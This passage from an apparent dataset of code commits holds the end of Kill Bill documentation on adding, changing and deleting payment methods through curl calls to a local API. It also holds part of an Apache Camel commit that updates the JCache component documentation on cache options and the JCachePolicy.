payment methods is to create an account in Kill Bill. This needs to be done once:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\"name\":\"john\",\"email\":\"john@foo.com\",\"currency\":\"USD\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n----\n\nThis call will return a 201 Location header containing the id associated with the newly created account. The rest of this document will assume this id is `268983f2-5443-47e4-a967-b8962fc699c5`, make sure to update your commands accordingly.\n\nTo add a payment method, POST the following information:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\"pluginName\":\"__EXTERNAL_PAYMENT__\",\"pluginInfo\":{}}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nThis will create a default payment method associated with our account and the __EXTERNAL_PAYMENT__ plugin. *The `pluginInfo` fields are specific to the plugin* and can be seen as a contract between the client of the API and the plugin itself (opaque to Kill Bill). For example, to add a payment method stored in PayPal, the https:\/\/github.com\/killbill\/killbill-paypal-express-plugin[PayPal Express plugin] expects a field named `token`, with the value of the Paypal BAID.\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\n \"pluginName\": \"killbill-paypal-express\",\n \"pluginInfo\": {\n \"properties\": [{\n \"key\": \"token\",\n \"value\": \"20G53990M6953444J\"\n }]\n }\n }' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nCheck our https:\/\/github.com\/killbill\/killbill-paypal-demo[PayPal demo] for an implementation example.\n\nThe https:\/\/github.com\/killbill\/killbill-litle-plugin[Litle&Co. plugin] on the other hand expects some fields like the `paypageRegistrationId` (using Litle's tokenization service):\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\n \"pluginName\": \"killbill-litle\",\n \"pluginInfo\": {\n \"properties\": [\n {\n \"key\": \"paypageRegistrationId\",\n \"value\": \"t3GER3BP3JHLASZe\"\n },\n {\n \"key\": \"ccFirstName\",\n \"value\": \"John\"\n },\n {\n \"key\": \"ccLastName\",\n \"value\": \"Doe\"\n },\n {\n \"key\": \"ccType\",\n \"value\": \"VISA\"\n },\n {\n \"key\": \"ccExpirationMonth\",\n \"value\": \"12\"\n },\n {\n \"key\": \"ccExpirationYear\",\n \"value\": \"2015\"\n },\n {\n \"key\": \"ccLast4\",\n \"value\": \"1234\"\n },\n {\n \"key\": \"address1\",\n \"value\": \"5, oakriu road\"\n },\n {\n \"key\": \"address2\",\n \"value\": \"apt. 298\"\n },\n {\n \"key\": \"city\",\n \"value\": \"Gdio Foia\"\n },\n {\n \"key\": \"state\",\n \"value\": \"FL\"\n },\n {\n \"key\": \"zip\",\n \"value\": \"49302\"\n },\n {\n \"key\": \"country\",\n \"value\": \"IFP\"\n }\n ]\n }\n }' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nCheck our https:\/\/github.com\/killbill\/killbill-litle-demo[Litle demo] for an implementation example.\n\nYou can add as many payment methods as needed to a given account (across one or multiple plugins). You can specify for each payment call the payment method to use, or leave it blank to use the default.\n\nEach payment method in Kill Bill has a unique uuid associated to it. Use this uuid to change the default payment method on the account (in this example, the payment method id `a91161b0-d159-11e3-9c1a-0800200c9a66` becomes the default one):\n\n\n[source,bash]\n----\ncurl -v \\\n -X PUT \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66\/setDefault\"\n----\n\n\nTo get information on a payment method, use the following endpoint:\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66?withPluginInfo=true\"\n----\n\nThe `withPluginInfo` query parameter tells Kill Bill to fetch plugin specific properties. These properties are custom key\/value pairs the plugin knows about the payment method, that are specific to that payment method.\n\n\nTo delete a payment method:\n\n[source,bash]\n----\ncurl -v \\\n -X DELETE \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66\"\n----\n\nThe payment method will be marked as inactive in Kill Bill. The actual deletion of the information is plugin specific (delete the information in the gateway, etc.).\n\nNote that by default you cannot delete the default payment method on an account (because it is assumed to be used for recurring payments). If you really want to delete it though, you can pass the query parameter deleteDefaultPmWithAutoPayOff=true to the previous call. This will delete it and set the account in AUTO_PAY_OFF (invoices won't be paid automatically anymore).\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af7797084f1d75bcb7d3b8be9e3621a887729516","subject":"Update jcache-component.adoc","message":"Update jcache-component.adoc\n","repos":"zregvart\/camel,apache\/camel,tdiesler\/camel,nicolaferraro\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,mcollovati\/camel,adessaigne\/camel,mcollovati\/camel,apache\/camel,ullgren\/camel,nicolaferraro\/camel,pax95\/camel,nicolaferraro\/camel,DariusX\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,gnodet\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,ullgren\/camel,christophd\/camel,pax95\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,mcollovati\/camel,gnodet\/camel,alvinkwekel\/camel,tdiesler\/camel,pmoerenhout\/camel,apache\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,tdiesler\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,gnodet\/camel,alvinkwekel\/camel,alvinkwekel\/camel,cunningt\/camel,gnodet\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,pax95\/camel,ullgren\/camel,cunningt\/camel,nicolaferraro\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,DariusX\/camel,alvinkwekel\/camel,ullgren\/camel,zregvart\/camel,pax95\/camel,pmoerenhout\/camel,tadayosi\/camel,mcollovati\/camel,zregvart\/camel","old_file":"components\/camel-jcache\/src\/main\/docs\/jcache-component.adoc","new_file":"components\/camel-jcache\/src\/main\/docs\/jcache-component.adoc","new_contents":"[[jcache-component]]\n= JCache Component\n\n*Since Camel 2.17*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe JCache component enables you to perform caching operations using JSR107\/JCache as cache implementation.\n\n== URI Format\n\n[source,java]\n----------------------------\njcache:cacheName[?options]\n----------------------------\n\n== URI Options\n\n\/\/ endpoint options: START\nThe JCache endpoint is configured using URI syntax:\n\n----\njcache:cacheName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheName* | *Required* The name of the cache | | String\n|===\n\n\n=== Query Parameters (24 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheConfiguration* (common) | A Configuration for the Cache | | Configuration\n| *cacheConfigurationProperties* (common) | The Properties for the javax.cache.spi.CachingProvider to create the CacheManager | | Properties\n| *cachingProvider* (common) | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *configurationUri* (common) | An implementation specific URI for the CacheManager | | String\n| *managementEnabled* (common) | Whether management gathering is enabled | false | boolean\n| *readThrough* (common) | If read-through caching should be used | false | boolean\n| *statisticsEnabled* (common) | Whether statistics gathering is enabled | false | boolean\n| *storeByValue* (common) | If cache should use store-by-value or store-by-reference semantics | true | boolean\n| *writeThrough* (common) | If write-through caching should be used | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *filteredEvents* (consumer) | Events a consumer should filter (multiple events can be separated by comma). If using filteredEvents option, then eventFilters one will be ignored | | String\n| *oldValueRequired* (consumer) | if the old value is required for events | false | boolean\n| *synchronous* (consumer) | if the event listener should block the thread causing the event | false | boolean\n| *eventFilters* (consumer) | The CacheEntryEventFilter. If using eventFilters option, then filteredEvents one will be ignored | | List\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *action* (producer) | To configure using a cache operation by default. If an operation in the message header, then the operation from the header takes precedence. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *cacheLoaderFactory* (advanced) | The CacheLoader factory | | Factory\n| *cacheWriterFactory* (advanced) | The CacheWriter factory | | Factory\n| *createCacheIfNotExists* (advanced) | Configure if a cache need to be created if it does exist or can't be pre-configured. | true | boolean\n| *expiryPolicyFactory* (advanced) | The ExpiryPolicy factory | | Factory\n| *lookupProviders* (advanced) | Configure if a camel-cache should try to find implementations of jcache api in runtimes like OSGi. | false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-jcache-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 9 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.jcache.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.jcache.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.jcache.cache-configuration* | A Configuration for the Cache. The option is a javax.cache.configuration.Configuration type. | | String\n| *camel.component.jcache.cache-configuration-properties* | Properties to configure jcache | | Map\n| *camel.component.jcache.cache-configuration-properties-ref* | References to an existing Properties or Map to lookup in the registry to use for configuring jcache. | | String\n| *camel.component.jcache.caching-provider* | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *camel.component.jcache.configuration-uri* | An implementation specific URI for the CacheManager | | String\n| *camel.component.jcache.enabled* | Whether to enable auto configuration of the jcache component. This is enabled by default. | | Boolean\n| *camel.component.jcache.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n\n\n\n\n\n\/\/ component options: START\nThe JCache component supports 8 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cachingProvider* (common) | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *cacheConfiguration* (common) | A Configuration for the Cache | | Configuration\n| *cacheConfiguration Properties* (common) | Properties to configure jcache | | Map\n| *cacheConfiguration PropertiesRef* (common) | References to an existing Properties or Map to lookup in the registry to use for configuring jcache. | | String\n| *configurationUri* (common) | An implementation specific URI for the CacheManager | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n== JCache Policy\n\nThe JCachePolicy is an interceptor around a route that caches the \"result of the route\" - the message body - after the route is completed.\n If next time the route is called with a \"similar\" Exchange, the cached value is used on the Exchange instead of executing the route.\n The policy uses the JSR107\/JCache API of a cache implementation, so it's required to add one (e.g. Hazelcast, Ehcache) to the classpath.\n\nThe policy takes a _key_ value from the received Exchange to get or store values in the cache. By default the _key_ is the message body.\n For example if the route - having a JCachePolicy - receives an Exchange with a String body \"fruit\" and the body at the\n end of the route is \"apple\", it stores a _key\/value_ pair \"fruit=apple\" in the cache. If next time another Exchange arrives\n with a body \"fruit\", the value \"apple\" is taken from the cache instead of letting the route process the Exchange.\n\nSo by default the message body at the beginning of the route is the cache _key_ and the body at the end is the stored _value_.\n It's possible to use something else as _key_ by setting a Camel Expression via _.setKeyExpression()_\n that will be used to determine the key.\n\nThe policy needs a JCache Cache. It can be set directly by _.setCache()_ or the policy will try to get or create the Cache\n based on the other parameters set.\n\nSimilar caching solution is available for example in Spring using the @Cacheable annotation.\n\n== JCachePolicy Fields\n\n\n[width=\"100%\",cols=\"2,5,3,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cache* | The Cache to use to store the cached values. If this value is set, _cacheManager_, _cacheName_ and _cacheConfiguration_ is ignored. | | Cache\n| *cacheManager* | The CacheManager to use to lookup or create the Cache. Used only if _cache_ is not set. | Try to find a CacheManager in CamelContext registry or calls the standard JCache _Caching.getCachingProvider().getCacheManager()_. | CacheManager\n| *cacheName* | Name of the cache. Get the Cache from cacheManager or create a new one if it doesn't exist. | RouteId of the route. | String\n| *cacheConfiguration* | JCache cache configuration to use if a new Cache is created | Default new _MutableConfiguration_ object. | CacheConfiguration\n| *keyExpression* | An Expression to evaluate to determine the cache key. | Exchange body | Expression\n| *enabled* | If policy is not enabled, no wrapper processor is added to the route. It has impact only during startup, not during runtime. For example it can be used to disable caching from properties. | true | boolean\n|===\n\n== How to determine cache to use?\n\n\n== Set cache\n\nThe cache used by the policy can be set directly. This means you have to configure the cache yourself and get a JCache Cache object,\n but this gives the most flexibility. For example it can be setup in the config xml of the cache provider (Hazelcast, EhCache, ...)\n and used here. Or it's possible to use the standard Caching API as below:\n\n\n[source,java]\n----------------------------\nMutableConfiguration configuration = new MutableConfiguration<>();\nconfiguration.setTypes(String.class, Object.class);\nconfiguration.setExpiryPolicyFactory(CreatedExpiryPolicy.factoryOf(new Duration(TimeUnit.MINUTES, 60)));\nCacheManager cacheManager = Caching.getCachingProvider().getCacheManager();\nCache cache = cacheManager.createCache(\"orders\",configuration);\n\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCache(cache);\n\nfrom(\"direct:get-orders\")\n .policy(jcachePolicy)\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\");\n----------------------------\n\n== Set cacheManager\n\nIf the _cache_ is not set, the policy will try to lookup or create the cache automatically.\n If the _cacheManager_ is set on the policy, it will try to get cache with the set _cacheName_ (routeId by default) from the CacheManager.\n If the cache does not exist it will create a new one using the _cacheConfiguration_ (new MutableConfiguration by default).\n\n[source,java]\n----------------------------\n\/\/In a Spring environment for example the CacheManager may already exist as a bean\n@Autowire\nCacheManager cacheManager;\n...\n\n\/\/Cache \"items\" is used or created if not exists\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCacheManager(cacheManager);\njcachePolicy.setCacheName(\"items\")\n----------------------------\n\n== Find cacheManager\n\nIf _cacheManager_ (and the _cache_) is not set, the policy will try to find a JCache CacheManager object:\n\n* Lookup a CacheManager in Camel registry - that falls back on JNDI or Spring context based on the environment\n* Use the standard api _Caching.getCachingProvider().getCacheManager()_\n\n[source,java]\n----------------------------\n\/\/A Cache \"getorders\" will be used (or created) from the found CacheManager\nfrom(\"direct:get-orders\").routeId(\"getorders\")\n .policy(new JCachePolicy())\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\");\n----------------------------\n\n== Partially wrapped route\n\nIn the examples above the whole route was executed or skipped. A policy can be used to wrap only a segment of the route instead of all processors.\n\n[source,java]\n----------------------------\nfrom(\"direct:get-orders\")\n .log(\"Order requested: ${body}\")\n .policy(new JCachePolicy())\n .log(\"Getting order with id: ${body}\")\n .bean(OrderService.class,\"findOrderById(${body})\")\n .end()\n .log(\"Order found: ${body}\");\n----------------------------\n\nThe _.log()_ at the beginning and at the end of the route is always called, but the section inside _.policy()_ and _.end()_ is executed based on the cache.\n\n== KeyExpression\n\nBy default the policy uses the received Exchange body as _key_, so the default expression is like _simple(\"$\\{body\\})_.\n We can set a different Camel Expression as _keyExpression_ which will be evaluated to determine the key.\n For example if we try to find an _order_ by an _orderId_ which is in the message headers,\n set _header(\"orderId\")_ (or _simple(\"${header.orderId})_ as _keyExpression_.\n\nThe expression is evaluated only once at the beginning of the route to determine the _key_. If nothing was found in cache,\n this _key_ is used to store the _value_ in cache at the end of the route.\n\n[source,java]\n----------------------------\nMutableConfiguration configuration = new MutableConfiguration<>();\nconfiguration.setTypes(String.class, Order.class);\nconfiguration.setExpiryPolicyFactory(CreatedExpiryPolicy.factoryOf(new Duration(TimeUnit.MINUTES, 10)));\n\nJCachePolicy jcachePolicy = new JCachePolicy();\njcachePolicy.setCacheConfiguration(configuration);\njcachePolicy.setCacheName(\"orders\")\njcachePolicy.setKeyExpression(simple(\"${header.orderId}))\n\n\/\/The cache key is taken from \"orderId\" header.\nfrom(\"direct:get-orders\")\n .policy(jcachePolicy)\n .log(\"Getting order with id: ${header.orderId}\")\n .bean(OrderService.class,\"findOrderById(${header.orderId})\");\n----------------------------\n\n== Camel XML DSL examples\n\n== Use JCachePolicy in an XML route\n\nIn Camel XML DSL we need a named reference to the JCachePolicy instance (registered in CamelContext or simply in Spring).\n We have to wrap the route between <policy>...<\/policy> tags after <from>.\n\n[source,xml]\n----------------------------\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:get-order\"\/>\n <policy ref=\"jCachePolicy\" >\n <setBody>\n <method ref=\"orderService\" method=\"findOrderById(${body})\"\/>\n <\/setBody>\n <\/policy>\n <\/route>\n<\/camelContext>\n----------------------------\n\nSee this example when only a part of the route is wrapped:\n\n[source,xml]\n----------------------------\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:get-order\"\/>\n <log message=\"Start - This is always called. body:${body}\"\/>\n <policy ref=\"jCachePolicy\" >\n <log message=\"Executing route, not found in cache. body:${body}\"\/>\n <setBody>\n <method ref=\"orderService\" method=\"findOrderById(${body})\"\/>\n <\/setBody>\n <\/policy>\n <log message=\"End - This is always called. body:${body}\"\/>\n <\/route>\n<\/camelContext>\n----------------------------\n\n\n== Define CachePolicy in Spring\n\nIt's more convenient to create a JCachePolicy in Java especially within a RouteBuilder using the Camel DSL expressions,\n but see this example to define it in a Spring XML:\n\n[source,xml]\n----------------------------\n<bean id=\"jCachePolicy\" class=\"org.apache.camel.component.jcache.policy.JCachePolicy\">\n <property name=\"cacheName\" value=\"spring\"\/>\n <property name=\"keyExpression\">\n <bean class=\"org.apache.camel.model.language.SimpleExpression\">\n <property name=\"expression\" value=\"${header.mykey}\"\/>\n <\/bean>\n <\/property>\n<\/bean>\n----------------------------\n\n== Create Cache from XML\n\nIt's not strictly speaking related to Camel XML DSL, but JCache providers usually have a way to configure the cache in an XML file.\n For example with Hazelcast you can add a _hazelcast.xml_ to classpath to configure the cache \"spring\" used in the example above.\n\n[source,xml]\n----------------------------\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<hazelcast xmlns=\"http:\/\/www.hazelcast.com\/schema\/config\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.hazelcast.com\/schema\/config hazelcast-config-3.11.xsd\" >\n\n <cache name=\"spring\">\n <key-type class-name=\"java.lang.String\"\/>\n <value-type class-name=\"java.lang.String\"\/>\n <expiry-policy-factory>\n <timed-expiry-policy-factory expiry-policy-type=\"CREATED\" duration-amount=\"60\" time-unit=\"MINUTES\"\/>\n <\/expiry-policy-factory>\n <\/cache>\n\n<\/hazelcast>\n----------------------------\n\n\n== Special scenarios and error handling\n\nIf the Cache used by the policy is closed (can be done dynamically), the whole caching functionality is skipped,\n the route will be executed every time.\n\nIf the determined _key_ is _null_, nothing is looked up or stored in cache.\n\nIn case of an exception during the route, the error handled is called as always. If the exception gets _handled()_,\n the policy stores the Exchange body, otherwise nothing is added to the cache.\n If an exception happens during evaluating the keyExpression, the routing fails, the error handler is called as normally.\n","old_contents":"[[jcache-component]]\n= JCache Component\n\n*Since Camel 2.17*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe JCache component enables you to perform caching operations using JSR107\/JCache as cache implementation.\n\n== URI Format\n\n[source,java]\n----------------------------\njcache:cacheName[?options]\n----------------------------\n\n== URI Options\n\n\/\/ endpoint options: START\nThe JCache endpoint is configured using URI syntax:\n\n----\njcache:cacheName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheName* | *Required* The name of the cache | | String\n|===\n\n\n=== Query Parameters (24 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheConfiguration* (common) | A Configuration for the Cache | | Configuration\n| *cacheConfigurationProperties* (common) | The Properties for the javax.cache.spi.CachingProvider to create the CacheManager | | Properties\n| *cachingProvider* (common) | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *configurationUri* (common) | An implementation specific URI for the CacheManager | | String\n| *managementEnabled* (common) | Whether management gathering is enabled | false | boolean\n| *readThrough* (common) | If read-through caching should be used | false | boolean\n| *statisticsEnabled* (common) | Whether statistics gathering is enabled | false | boolean\n| *storeByValue* (common) | If cache should use store-by-value or store-by-reference semantics | true | boolean\n| *writeThrough* (common) | If write-through caching should be used | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *filteredEvents* (consumer) | Events a consumer should filter (multiple events can be separated by comma). If using filteredEvents option, then eventFilters one will be ignored | | String\n| *oldValueRequired* (consumer) | if the old value is required for events | false | boolean\n| *synchronous* (consumer) | if the event listener should block the thread causing the event | false | boolean\n| *eventFilters* (consumer) | The CacheEntryEventFilter. If using eventFilters option, then filteredEvents one will be ignored | | List\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *action* (producer) | To configure using a cache operation by default. If an operation in the message header, then the operation from the header takes precedence. | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *cacheLoaderFactory* (advanced) | The CacheLoader factory | | Factory\n| *cacheWriterFactory* (advanced) | The CacheWriter factory | | Factory\n| *createCacheIfNotExists* (advanced) | Configure if a cache need to be created if it does exist or can't be pre-configured. | true | boolean\n| *expiryPolicyFactory* (advanced) | The ExpiryPolicy factory | | Factory\n| *lookupProviders* (advanced) | Configure if a camel-cache should try to find implementations of jcache api in runtimes like OSGi. | false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-jcache-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 9 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.jcache.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.jcache.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.jcache.cache-configuration* | A Configuration for the Cache. The option is a javax.cache.configuration.Configuration type. | | String\n| *camel.component.jcache.cache-configuration-properties* | Properties to configure jcache | | Map\n| *camel.component.jcache.cache-configuration-properties-ref* | References to an existing Properties or Map to lookup in the registry to use for configuring jcache. | | String\n| *camel.component.jcache.caching-provider* | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *camel.component.jcache.configuration-uri* | An implementation specific URI for the CacheManager | | String\n| *camel.component.jcache.enabled* | Whether to enable auto configuration of the jcache component. This is enabled by default. | | Boolean\n| *camel.component.jcache.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n\n\n\n\n\n\/\/ component options: START\nThe JCache component supports 8 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cachingProvider* (common) | The fully qualified class name of the javax.cache.spi.CachingProvider | | String\n| *cacheConfiguration* (common) | A Configuration for the Cache | | Configuration\n| *cacheConfiguration Properties* (common) | Properties to configure jcache | | Map\n| *cacheConfiguration PropertiesRef* (common) | References to an existing Properties or Map to lookup in the registry to use for configuring jcache. | | String\n| *configurationUri* (common) | An implementation specific URI for the CacheManager | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| 